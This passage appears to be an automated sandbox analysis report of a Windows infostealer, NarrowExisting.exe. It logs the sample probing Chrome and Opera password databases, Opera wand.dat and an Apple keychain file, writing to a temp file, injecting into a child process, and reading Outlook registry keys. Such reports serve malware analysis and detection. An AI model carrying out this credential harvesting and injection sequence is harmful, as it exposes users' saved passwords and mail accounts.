| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data, size = 100, size_out = 100 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Apple Computer\Preferences\keychain.plist, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera\wand.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera7\profile\wand.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Opera Software\Opera Stable\Login Data, type = file_attributes |
|
1 | |
| File | Create | filename = C:\ProgramData\114F.tmp, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 3 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 11 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 9 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 8 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 17 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 15 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 14 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 12 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 13 |
|
1 | |
| File | Write | filename = C:\ProgramData\114F.tmp, size = 2 |
|
1 |
Process #17: narrowexisting.exe
45
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:41, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:51 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbec |
| Parent PID | 0xa68 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B30
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x005dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00767fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0078ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00910fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x01d1ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x620 | address = 0x400000, size = 102400 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x620 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x620 | address = 0x7efdf010, size = 4 |
|
1 | |
| Modify Control Flow | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x620 | os_tid = 0xb30, address = 0x0 |
|
1 |
Threads
Thread 0xb30
45
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-04-05 07:22:14 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x74cc4f2b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x74cc359f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74cc1252 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74cc4208 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x74cc4d28 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x74d4410b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x74d44195 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x74ccd31f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x74cdee7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7711441c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7713c50e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7713c381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x74cdf088 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771205d7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7713ca24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x770f0b8c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x771afde8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77141e1d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x74d44761 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x74d3cd11 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x74d4424f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x74d446b1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x74d56676 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x74d44751 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x74d565f1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x74d447c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x74d447e1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x74d447f1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x74cdeee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = DLLPathEx, data = 67 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = MSIApplicationLCID, data = 77 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\system\msmapi\1033\msmapi32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Handle | module_name = mscoree.dll |
|
1 |
